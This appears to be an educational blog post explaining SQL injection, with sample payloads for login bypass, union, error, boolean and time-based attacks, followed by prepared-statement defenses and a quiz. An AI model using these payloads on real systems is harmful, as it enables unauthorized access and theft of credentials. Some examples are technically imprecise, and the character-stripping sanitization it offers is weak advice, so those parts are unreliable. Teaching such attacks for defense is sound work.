- Published on
π‘οΈ Cyber Threats Series, Part 3: SQL Injection π»π₯
- Authors
- Name
- Wisit Longsida
- @__ART3MISS
Welcome to Part 3 of the Cyber Threats Series, where weβll learn about SQL Injection attacks, how they work, and ways to stop them. π
SQL Injection (SQLi) is a technique hackers use to manipulate a database by injecting malicious SQL commands through user inputs. Letβs break this down step by step to make it easy to understand! π
What Is SQL? π€
SQL (Structured Query Language) is a programming language used to manage data in relational databases. Think of a database as a collection of tables like this:
| orders | items |
|---|---|
| order_number (PK) | item_id (PK) |
| item_id (FK) | price |
| cost | description |
SQL helps applications retrieve and manage this data through queries like:
SELECT: Retrieve dataINSERT: Add new dataUPDATE: Modify existing data
What Is SQL Injection? π¨
SQL Injection (SQLi) is a cyber attack where hackers insert malicious SQL commands into an input field to manipulate the database.
Example:
A website login form may run this query:
SELECT * FROM Users WHERE username = 'input_username' AND password = 'input_password';
If a hacker enters:
' OR '1'='1
The query becomes:
SELECT * FROM Users WHERE username = '' OR '1'='1';
This always returns TRUE, giving the hacker unauthorized access! π±
Types of SQL Injection Attacks π οΈ
1. Union-Based Injection π€
Hackers use the UNION keyword to combine data from different tables.
Example:
SELECT product_name FROM products WHERE name = 'soap' UNION SELECT username, password FROM Users;
This lets the hacker steal sensitive data like usernames and passwords.
2. Error-Based Injection β
Attackers force the database to display errors containing sensitive information.
Example:
asdf' UNION SELECT 1, exp(~(SELECT password FROM users WHERE id=1))-- -
This causes an error that reveals the password!
3. Boolean-Based Injection β β
Hackers test conditions by observing True/False responses.
Example:
SELECT username FROM users WHERE id = '1' AND '1'='2';
If False, no data returns. If True, the hacker learns more about the database structure.
4. Time-Based Injection π
Hackers use SQL functions like SLEEP() to delay responses and confirm conditions.
Example:
' OR IF(password='admin123', SLEEP(5), NULL)-- -
If the response delays by 5 seconds, the hacker knows the password is correct!
5. Out-of-Band Injection π
Rare and complex, this method uses channels like HTTP or DNS to send data to an attackerβs server.
How to Prevent SQL Injections π‘οΈ
1. Input Sanitization π§Ή
- Remove dangerous characters like
',;,-. - Example: Replace
'with'.
β οΈ Limitations: If sanitization fails, the system is still vulnerable.
2. Use Prepared Statements π
Prepared statements securely separate SQL queries from user input, making injections almost impossible.
Example:
In PHP:
$stmt = $conn->prepare("SELECT * FROM Users WHERE username = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
This ensures any user input is treated as data, not SQL code.
Quiz Time! π
Q1: What type of SQL injection delays responses to confirm conditions?
A) Error-Based Injection
B) Boolean-Based Injection
C) Time-Based Injection
D) Out-of-Band Injection
Answer: C) Time-Based Injection
Q2: Which is an example of input sanitization?
A) Removing dangerous characters like ', ;, and --
B) Using prepared statements
C) Cleaning sensitive user data
D) Blocking SQL commands with firewalls
Answer: A) Removing dangerous characters like ', ;, and --
Conclusion π―
SQL Injections are powerful and dangerous, but theyβre preventable with the right techniques. By understanding how attackers exploit SQL and implementing sanitization and prepared statements, you can keep your systems secure. πͺ
Stay tuned for Part 4, where weβll uncover more about cyber threats! π